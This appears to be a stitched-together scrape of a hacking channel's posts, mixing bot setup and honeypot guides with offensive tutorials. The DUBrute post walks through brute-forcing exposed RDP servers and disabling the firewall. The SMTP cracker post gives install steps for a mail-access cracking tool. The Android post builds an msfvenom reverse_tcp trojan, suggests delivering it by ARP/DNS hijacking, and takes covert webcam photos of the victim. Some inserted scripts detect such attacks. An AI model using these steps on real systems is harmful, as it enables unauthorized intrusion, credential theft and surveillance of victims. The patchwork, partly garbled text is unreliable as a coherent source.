▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑TwitterBOT :
INSTALLATION :
Connecting to Twitter :
1) Register a Twitter account and also get its "app info".
Twitter doesn't allow you to register multiple twitter accounts on the same email address. I recommend you create a brand new email address (perhaps using Gmail) for the Twitter account. Once you register the account to that email address, wait for the confirmation email.
2) Now go here and log in as the Twitter account for your bot:
3) Fill out the form and submit.
Next, once the submission completes, you will be taken to a page which has the
tab : Update details here
"Permissions" tab : Enable Read and Write
"Key and Access Token" tab : Click on Create my access token.
4) Use the generated tokens in the "Key and Access Token" tab to fill the fields in the config.js file in your app directory. It should look like this:
// config.js: credentials from the "Key and Access Token" tab
module.exports = {
  consumer_key: 'blah',
  consumer_secret: 'blah',
  access_token: 'blah',
  access_token_secret: 'blah'
}
5) Update the code in bot.js with your values. Best of all, modify the code and tinker with it.
6) Now type the following in the command line in your project directory:
node bot.js
7) Hopefully at this point you see a message like "Success! Check your bot, it should have retweeted something." OK, it won't say that; you have to code that in. It's as simple as:
console.log("Success! Check your bot, it should have retweeted something.");
8) Check the Twitter account for your bot, and it should have retweeted a tweet with the provided hashtag.
RUN :
1) git clone https://github.com/nisrulz/twitterbot-nodejs.git
2) Run
npm install
enjoy❤️👍🏻
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑ZERO-DAY TUTORIAL :
Libemu is a library used for shellcode detection and x86 emulation. Libemu can detect malware inside documents such as RTF, PDF, etc., and we can use it to identify hostile behavior by using heuristics. This is an advanced form of a honeypot, and beginners should not try it.
I recommend not using it on a system that will be used for other purposes, as the libraries and code we install may damage other parts of your system. Dionaea, on the other hand, is unsafe: if it gets compromised, your whole system will be compromised. For this reason the lean install should be used; Debian and Ubuntu systems are preferred.
INSTALLATION & RUN :
Install dependencies:
Dionaea is a composite piece of software, and it requires many dependencies that are not installed by default on systems like Ubuntu and Debian. So we will have to install the dependencies before installing Dionaea, and it can be a dull task.
For example, we need to install the following packages to begin.
1) $ sudo apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev \
   libreadline-dev libsqlite3-dev python-dev libtool automake autoconf \
   build-essential subversion git-core flex bison pkg-config libnl-3-dev \
   libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev sqlite3
2) A script by Andrew Michael Smith can be downloaded from GitHub using wget. Once downloaded, this script installs the applications (SQLite) and dependencies, then downloads and configures Dionaea.
$ wget -q https://raw.github.com/andremichaelsmith/honeypot-setup-script/master/setup.bash -O /tmp/setup.bash && bash /tmp/setup.bash
3) Choose an interface:
Dionaea will configure itself, and after the dependencies and applications are downloaded it will ask you to select the network interface you want the honeypot to listen on.
4) Configuring Dionaea:
Now the honeypot is all set and running. In future tutorials, I will show you how to identify the items of the attackers, how to set up Dionaea to alert you in real time when an attack happens, and how to look over and capture the shellcode of the attack. We will test it with our attack tools and Metasploit to check that we can capture malware before placing it live online.
5) Open the Dionaea configuration file:
$ cd /etc/dionaea
6) Vim or any other text editor can be used. Leafpad is used in this case.
$ sudo leafpad dionaea.conf
7) Configure logging:
In several cases, log files of multiple gigabytes have been seen. Log error priorities should be configured; for this purpose, scroll down to the logging section of the file.
8) Services:
Dionaea is set up to run https, http, FTP, TFTP, smb, epmap, sip, mssql, and mysql.
Disable HTTP and HTTPS, because hackers are not likely to be fooled by them and they are not vulnerable. Leave the others enabled, because they are unsafe services that hackers can easily attack.
9) Start dionaea to test:
We have to run dionaea so that it picks up our new configuration. We can do this by typing:
$ sudo dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/run/dionaea.pid
10) Dionaea is now running successfully, and we can capture and analyze malware with its help.
- Darkiwiki
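Once dionaea has been started with the edited configuration, it is worth confirming what the host really exposes: HTTP and HTTPS should be gone, the remaining honeypot services should be listening, and the daemon should be running as an unprivileged user. The script below is an added example, not part of the tutorial or of Dionaea; the port numbers are the standard defaults for the services listed above (assumed unchanged) and the sample `ss` output is constructed.

```shell
#!/bin/sh
# Added example (not from the tutorial or the Dionaea project).
# Audits which TCP ports a freshly started honeypot host is listening on.
# Port numbers are the standard defaults for the services the post lists;
# that this install binds them unchanged is an assumption. TFTP is UDP-only
# and is therefore not covered by this TCP check.

EXPECTED_TCP="21 135 445 1433 3306 5060"  # ftp epmap smb mssql mysql sip
DISABLED_TCP="80 443"                     # http https, disabled in the Services step

# Constructed sample of `ss -H -ltn` output, for running the audit offline.
sample_ss_output() {
    cat <<'EOF'
LISTEN 0 128 0.0.0.0:21 0.0.0.0:*
LISTEN 0 128 0.0.0.0:445 0.0.0.0:*
LISTEN 0 128 0.0.0.0:80 0.0.0.0:*
LISTEN 0 128 [::]:445 [::]:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
EOF
}

# Read `ss -H -ltn` lines on stdin; print the unique listening ports,
# space separated. The port is whatever follows the last ':' of column 4.
listening_ports() {
    awk '$1 == "LISTEN" { n = split($4, a, ":"); print a[n] }' |
        sort -n -u | paste -sd ' ' -
}

# in_list "<space separated list>" <item>
in_list() {
    for _item in $1; do
        [ "$_item" = "$2" ] && return 0
    done
    return 1
}

# audit_ports "<space separated listening ports>"
# Prints one finding per line and returns 1 when a service that should
# have been disabled is still listening.
audit_ports() {
    _rc=0
    for _p in $DISABLED_TCP; do
        if in_list "$1" "$_p"; then
            echo "FAIL disabled-service-listening $_p"
            _rc=1
        fi
    done
    for _p in $EXPECTED_TCP; do
        in_list "$1" "$_p" || echo "WARN expected-service-missing $_p"
    done
    for _p in $1; do
        in_list "$EXPECTED_TCP $DISABLED_TCP" "$_p" || echo "INFO other-listener $_p"
    done
    return $_rc
}

# Live check: the account the daemon runs as ("nobody" when started with
# -u nobody). Defaults to the pid file path used in the start command.
dionaea_user() {
    ps -o user= -p "$(cat "${1:-/opt/dionaea/run/dionaea.pid}")" | tr -d ' '
}

# Offline demonstration on the constructed sample.
audit_ports "$(sample_ss_output | listening_ports)" || :
```

On the honeypot host itself, run `audit_ports "$(ss -H -ltn | listening_ports)"` and check that `dionaea_user` prints `nobody`; an `INFO other-listener` line for your management SSH port is expected.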
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑3389 blasting tool DUBrute use tutorial (graphic)
DUBrute is a powerful remote desktop (3389) password cracking software. You can use the scanning function of this accessory to automatically scan for active IP addresses. After the scan is completed, set the user name and the passwords that need to be guessed and you can start fully automatic work. As long as your password list is set well, I believe there will be great gains.
3389 is the remote desktop port. In order to make it easier to manage the server and update the resources on the server, many people open port 3389. Use the netstat -an command to check whether the port is open. If an account's password is too weak, it is easy to blast. Generally, the default account is Administrator, rarely admin. Passwords that are too simple can be found in the 3389 password dictionary. Let's explain the whole process of blasting a 3389 server.
INSTALLATION & RUN :
1) First use IP seacher to search for an active IP segment, or search for an active 3389 IP segment on Baidu, followed by SYN scanning, preferably under a server2003 server or virtual machine. If you insist on scanning under XP, let XP support SYN scanning first: copy the tcpip patch that supports SYN to the C:\Windows\System32\Drives directory, then restart the SYN scan. For a newly installed server2003 system, first apply the following service settings.
The code is shown below:
sc config LmHosts start= auto
sc config RpcLocator start= auto
sc config NtlmSsp start= auto
sc config lanmanserver start= auto
sc config SharedAccess start= disabled
net start LmHosts 2>nul
net start RpcLocator 2>nul
net start NtlmSsp 2>nul
net start lanmanserver 2>nul
REM Stop the firewall
net stop SharedAccess >nul 2>nul
2) Copy the IP segment from IP seach to ip.txt under the SYN scanner and let it scan for a period of time. After scanning, the ips file is produced. The IPs in the IPS file are the ones with port 3389 open.
3) The following uses the DUbrute3.0 tool (multiple password blasting; versions below this one blast a single password).
4) Source means "source"; Bad means "bad"; Good means "good"; Error means "wrong"; Check means "detection"; Thread means "thread"; Start means "start"; Stop means "stop"; Config means "configuration"; Generation means "generate"; About means "About"; Exit means "Exit".
5) That covers the important translations. Next, import the 3389 IPs that need to be blasted: open Generation directly. After opening it, you will find that there are three columns that need to be filled. The first column is the IPs that need to be blasted; we directly click File IP to import all the IPs under IPS. The second column, Login, is the login account; we can directly select Add Login to add the user names. Two are fine, just Administrator or Admin. Of course you can also import a username dictionary, but this is slower. In the third column, Password, select File pass to import our 3389 password dictionary. Finally click made to exit the interface.
6) Click Config to configure.
7) OK, click Start to begin blasting and wait. The number behind Good indicates how many servers we have successfully blasted, and Bad indicates the bad ones; those in progress are in Check. We can open the Good document under DUbrute, and there you can see the IPs of the servers that were blasted successfully with their login accounts and passwords.
The tutorial is very simple, the key is to understand the principle by yourself. By Undercode
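Seen from the defending side, the dictionary run described in this tutorial shows up in the Windows Security log as a burst of failed logons (Event ID 4625) from one source against names such as Administrator and Admin, and a later successful logon (Event ID 4624) from that same source is the case that lands in the tool's Good list. The script below is an added example, not part of the original post; the CSV layout, the thresholds and the sample events are constructed.

```shell
#!/bin/sh
# Added example (not from the original post): find RDP dictionary attacks
# in an export of Windows Security events.
# Assumed, constructed CSV layout, sorted by time:
#   epoch_seconds,event_id,logon_type,account,source_ip
# Event ID 4625 = failed logon, 4624 = successful logon.
# Logon type 10 = RemoteInteractive (RDP); failed RDP logons are recorded
# as type 3 when Network Level Authentication is enabled.

# Constructed sample: one noisy source, one user who mistyped twice,
# and one local console failure that must be ignored.
sample_events() {
    cat <<'EOF'
1600000000,4625,3,Administrator,203.0.113.50
1600000005,4625,3,Administrator,203.0.113.50
1600000010,4625,3,Admin,203.0.113.50
1600000020,4625,2,alice,-
1600000030,4625,3,Administrator,203.0.113.50
1600000040,4625,3,Admin,203.0.113.50
1600000050,4625,3,Administrator,203.0.113.50
1600000100,4625,10,bob,198.51.100.7
1600000400,4625,10,bob,198.51.100.7
1600000410,4624,10,bob,198.51.100.7
1600000500,4624,3,Administrator,203.0.113.50
EOF
}

# rdp_bruteforce_report THRESHOLD WINDOW_SECONDS  < events.csv
# BRUTEFORCE ip peak accounts     : at least THRESHOLD failures from ip
#                                   inside one sliding window
# SUCCESS_AFTER_FAILURES ip acct  : a logon succeeded from an ip that had
#                                   already failed THRESHOLD times or more
rdp_bruteforce_report() {
    awk -F, -v T="$1" -v W="$2" '
        ($3 != 3 && $3 != 10) { next }          # not a remote logon
        $2 == 4625 {
            ip = $5
            n[ip]++; ts[ip, n[ip]] = $1
            # forget attempts that have slid out of the window
            while ($1 - ts[ip, head[ip] + 1] > W) head[ip]++
            inwin = n[ip] - head[ip]
            if (inwin > peak[ip]) peak[ip] = inwin
            if (!((ip, $4) in seen)) {
                seen[ip, $4] = 1
                sep = (accts[ip] == "") ? "" : "|"
                accts[ip] = accts[ip] sep $4
            }
        }
        $2 == 4624 && n[$5] >= T {
            print "SUCCESS_AFTER_FAILURES", $5, $4
        }
        END {
            for (ip in peak)
                if (peak[ip] >= T) print "BRUTEFORCE", ip, peak[ip], accts[ip]
        }' | sort
}

# Offline demonstration: 5 failures within 60 seconds is the trigger.
sample_events | rdp_bruteforce_report 5 60
```

A `SUCCESS_AFTER_FAILURES` line should be treated as a probable compromise of that account rather than as a blocked attempt.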
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Offensive_SPF_How_to_Automate_Anti_Phishing_Reconnaissance_Using.pdf
1.8 MB
Method for automating anti-phishing reconnaissance using Sender Policy Framework
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑TOR VS VPN, VPN AND TOR, WHICH ONE IS BETTER :
#forBeginers
If your goal is to encrypt the transmitted data so that your Internet provider cannot analyze it, then both Tor and a VPN that you set up yourself will do! I would not recommend using any third-party VPNs, since their owner can see all the transmitted traffic + client IP (that is, your IP address). If you use a third-party VPN service, then you are guaranteed to get a spy who, at a minimum, also knows your real IP address! If this is a paid VPN, then it is absolutely not suitable for anonymity, since the VPN service not only knows your IP and has access to all transmitted data, but also knows who you are from your payment details.
1) The self-configured OpenVPN allows you to encrypt the transmitted traffic and integrate your devices into a virtual private network. You can also hide your real IP address and bypass site blocking. But for anonymity, this option is not suitable, because for the operation of OpenVPN you need to rent a VPS, for which you have to pay. Although if you use cryptocurrency or other anonymous methods for payment, OpenVPN will help you to be anonymous.
2) Using a single proxy has the same disadvantages as a VPN: the eavesdropper + proxy service knows your real IP address. An additional drawback in the absence of encryption is that your ISP can still analyze your traffic and even block access to websites.
3) The situation with IP concealment improves if a proxy chain is used, because (depending on the settings), each next proxy knows the IP address of the previous node (always) and the IP address of 1 node before the previous one (sometimes). If we consider that traffic is not encrypted at any stage, and a certain part of public proxies is just honeypots (intended for the exploitation of users), then the proxy option is not the best way to ensure anonymity.
#wikiresources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑2020 SMTP / Mail access Cracker :
Scanner & check & send to email
You can use this tool to crack SMTP mail access
INSTALLATION & RUN :
1️⃣ Installation Linux
1) cd Desktop
2) git clone https://github.com/aron-tn/SMTP-Mail.acess-Cracker-Checker
3) cd SMTP-Mail.acess-Cracker-Checker
4) python2 smtp.py
2️⃣ Installation Android
1) Download Termux
2) git clone https://github.com/aron-tn/SMTP-Mail.acess-Cracker-Checker
3) cd SMTP-Mail.acess-Cracker-Checker
4) python2 smtp.py
3️⃣ Installation Windows
1) Download cmder
2) cd Desktop
3) git clone https://github.com/aron-tn/SMTP-Mail.acess-Cracker-Checker
4) cd SMTP-Mail.acess-Cracker-Checker
5) smtp.py
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
For the US chip blockade Yu Chengdong: We are thinking of a way
#international
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑ANDROID HACKING METHOD :
MSF is the abbreviation of Metasploit. Metasploit is an open source security vulnerability detection tool. It is very powerful. There are Windows and Linux versions. The tool integrates many vulnerabilities announced by Microsoft (0day).
The system I tested here is Backbox linux, which is a network penetration and information security assessment system. Many tools are installed inside. MSF comes with it. Of course there are others such as Kali linux, Back Track, etc.
Environment: Backbox linux+MSF
Target: an Android phone
Since it is hacking an Android phone, an Android Trojan horse must be configured first, so let's take a look at the IP of the machine
RUN :
Local IP: 192.168.XZA.XYX
1) Enter the command in the terminal: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R> /root/apk.apk
The old version of MSF used msfpayload to generate Trojans. Now msfvenom is used instead in the new version, so some friends will get a prompt when they enter msfpayload in the terminal.
2) The prompt says the msfpayload command cannot be found, so just use msfvenom, where LHOST corresponds to the IP address of the machine, LPORT corresponds to the port you want to monitor, and the last part is the path where the Trojan is generated.
3) In this way, we have generated an APK Android Trojan file in the /root/ path. As for making the Trojan evade antivirus, let's leave that alone. Now we start the MSF tool
Enter the command: msfconsole
🦑Then enter:
4) use exploit/multi/handler to load the module
5) set payload android/meterpreter/reverse_tcp select Payload
6) show options view parameter settings
7) We see that there are two parameters in the payload to set, LHOST and LPORT, which mean the address and the port. The default port is 4444. Now let's change the settings.
RUN :
1) set LHOST 192.168.1.6 The address here is set to the IP address of the Trojan we just generated
2) set LPORT 5555 The port here is set to the port that we just generated the Trojan to monitor
3) The exploit starts to execute the vulnerability and starts monitoring...
OK, all preparations are ready. What we have to do now is to get the Trojan horse file onto the other party's mobile phone. There are many ways, such as using DNS arp hijacking to deceive: as long as the other party downloads a file with the mobile phone, it will download our Trojan file.
4) There is also social engineering and so on; here I will simply put the Trojan horse file on my own phone for testing
5) After the installation is complete, a MainActivity program icon will be generated on the desktop. This is the Trojan we just generated. When we click on this icon, the phone will show no response. In fact, the Trojan horse has started to run.
We can see in our MSF that there is a session connected
6) In this way, the other party's mobile phone is controlled by us. To view the mobile phone system information, enter the command sysinfo
webcam_list Check how many cameras there are on the phone. The two displayed here indicate that there are two cameras, front and rear.
webcam_snap hidden camera function
7) Follow it with the -i parameter to specify which camera takes the picture
You can see that we took photos with the front and rear cameras and saved them on the desktop
You can also enter the command webcam_stream to turn on the camera
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑best apps for youtubers :
https://itunes.apple.com/app/youtube-creator-studio/id888530356
https://play.google.com/store/apps/details?id=com.octoly.app&utm_source=octomag&utm_medium=footer_medium_app&utm_campaign=bestappsforyoutube
https://itunes.apple.com/us/app/octoly/id1100218563?mt=8
https://www.apple.com/imovie/
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Security hacking tool :
-termux/linux
FEATURES :
Reconnaissance:
  HTTP Header checks
  HTTP enabled methods check (Cross Site Tracing)
  Cookie checks (decodes base64 automatically)
Information Disclosure:
  Robots.txt Analysis
  .htaccess public access check
  .svn/entries public access check
  Microsoft IIS, internal IP disclosure check
Injection Attacks:
  Error based SQL injection:
    Cookie based
    User-Agent based
  CRLF injection:
    CRLF tests on main URLs
  Host header injection:
    Modifying Host header
    Adding X-Forwarded-Host additional header
Clickjacking:
  X-FRAME-OPTIONS header check
  Frame busting checks
INSTALLATION & RUN :
1) git clone https://github.com/a0xnirudh/WebXploiter.git
2) cd WebXploiter
3) Just run python install.py from install directory. Rest is taken care of :)
4) A sample output against localhost:
python WebXploiter.py -u "http://localhost/challs/action.php" -a
5) usage: WebXploiter.py [-h] [-u U] [-a] [-A1] [-A3]
Do a basic Recon for Web challenges
optional arguments:
  -h, --help    show this help message and exit
  -u U, -url U  Target URL to Recon
  -a, -all      Try all possible attacks
  -A1           Test for only Injection Attacks
  -A3           Test for only XSS Attacks
enjoyβ€οΈππ»
git topic
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑BEST ANDROID VIDEO EDITING APPS 2020
https://play.google.com/store/apps/details?id=com.wondershare.filmorago
https://play.google.com/store/apps/details?id=com.adobe.premiereclip
https://play.google.com/store/apps/details?id=com.xvideostudio.videoeditor
https://play.google.com/store/apps/details?id=com.cyberlink.powerdirector.DRA140225_01
https://play.google.com/store/apps/details?id=com.nexstreaming.app.kinemasterfree
https://play.google.com/store/apps/details?id=com.stupeflix.replay
https://play.google.com/store/apps/details?id=com.quvideo.xiaoying
https://play.google.com/store/apps/details?id=com.avcrbt.funimate
https://play.google.com/store/apps/details?id=com.magisto
https://play.google.com/store/apps/details?id=com.alivestory.android.alive
https://play.google.com/store/apps/details?id=com.funcamerastudio.videomaker
enjoy❤️👍🏻
git topic
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑MULTI HACKING TOOLS 2020 TOPIC :
* [GRR Rapid Response](https://github.com/google/grr) - Incident response framework focused on remote live forensics. It consists of a Python agent (client) that is installed on target systems, and a Python server infrastructure that can manage and talk to the agent. Besides the included Python API client, [PowerGRR](https://github.com/swisscom/PowerGRR) provides an API client library in PowerShell working on Windows, Linux and macOS for GRR automation and scripting.
* [Kolide Fleet](https://kolide.com/fleet) - State-of-the-art host monitoring platform tailored for security experts. Leveraging Facebook's battle-tested osquery project, Kolide delivers fast answers to big questions.
* [Limacharlie](https://github.com/refractionpoint/limacharlie) - Endpoint security platform composed of a collection of small projects all working together that gives you a cross-platform (Windows, OSX, Linux, Android and iOS) low-level environment for managing and pushing additional modules into memory to extend its functionality.
* [MozDef](https://github.com/mozilla/MozDef) - Automates the security incident handling process and facilitates the real-time activities of incident handlers.
* [nightHawk](https://github.com/biggiesmallsAG/nightHawkResponse) - Application built for asynchronous forensic data presentation using ElasticSearch as the backend. It's designed to ingest Redline collections.
* [Open Computer Forensics Architecture](http://sourceforge.net/projects/ocfa/) - Another popular distributed open-source computer forensics framework. This framework was built on the Linux platform and uses a PostgreSQL database for storing data.
* [osquery](https://osquery.io/) - Easily ask questions about your Linux and macOS infrastructure using a SQL-like query language; the provided *incident-response pack* helps you detect and respond to breaches.
* [Redline](https://www.fireeye.com/services/freeware/redline.html) - Provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis, and the development of a threat assessment profile.
* [The Sleuth Kit & Autopsy](http://www.sleuthkit.org) - Unix and Windows based tool which helps in forensic analysis of computers. It comes with various tools that help in digital forensics. These tools help in analyzing disk images, performing in-depth analysis of file systems, and various other things.
* [TheHive](https://thehive-project.org/) - Scalable 3-in-1 open source and free solution designed to make life easier for SOCs, CSIRTs, CERTs and any information security practitioner dealing with security incidents that need to be investigated and acted upon swiftly.
* [X-Ways Forensics](http://www.x-ways.net/forensics/) - Forensics tool for disk cloning and imaging. It can be used to find deleted files and for disk analysis.
* [Zentral](https://github.com/zentralopensource/zentral) - Combines osquery's powerful endpoint inventory features with a flexible notification and action framework. This enables one to identify and react to changes on OS X and Linux clients.
enjoy❤️👍🏻
git topic 2020
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑BEST FREE RDP (LIMITED TIME)
1) Amazon Web Services - EC2 (free for 12 months but 750 hours/month limit) - free tier t2.micro (1 core, 1 GB RAM) is too slow to run CGB.
2) Microsoft Azure - Virtual Machines (free $200 for 1-month trial)
3) Google Cloud - Compute Engine (free $300 for 60 days trial)
4) HP Helion - Cloud Compute (free $300 for 90 days trial)
Mid-tier:
1) Rackspace - https://developer.rackspace.com/ (free $600 for 12 months!)
2) DimensionData Public Cloud - https://cloud.dimens...n/limitedoffer/ (free $100)
3) RunAbove - Intel Steadfast instances https://www.runabove.com (free 1-week trial)
Others:
1) Vultr - https://www.vultr.com/ (free $50 for 2 months trial)
2) https://www.profitbricks.com/trial (free for 14 days) - no credit card needed, but you need a business email and a reason for using their VPS
3) http://cloudsigma.com/ (free for 7 days) - no credit card needed!
4) Digital Ocean - www.digitalocean.com - free $10 credit with promo code: DROPLET10 or DO10 - No Windows provided, but you can install it; there are lots of tutorials on how to do so
5) http://ezywatch.com/freevps/ (free for 1 month) - no credit card needed!
6) Legionhoster - VPS http://legionhoster.com (1 week trial available on request from helpdesk)
7) http://www.yellowcircle.net/ - no credit card needed! No network access was given!
8) https://www.ctl.io/free-trial/ (free $2500 or 1 month - whichever comes first)
9) https://www.ihor.ru/ (free for 3 days) - no credit card needed!
10) http://www.neuprime.com/l_vds3.php (free for 10 days trial) - phone verification required.
enjoy❤️👍🏻
FROM RANDOM FORUM
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁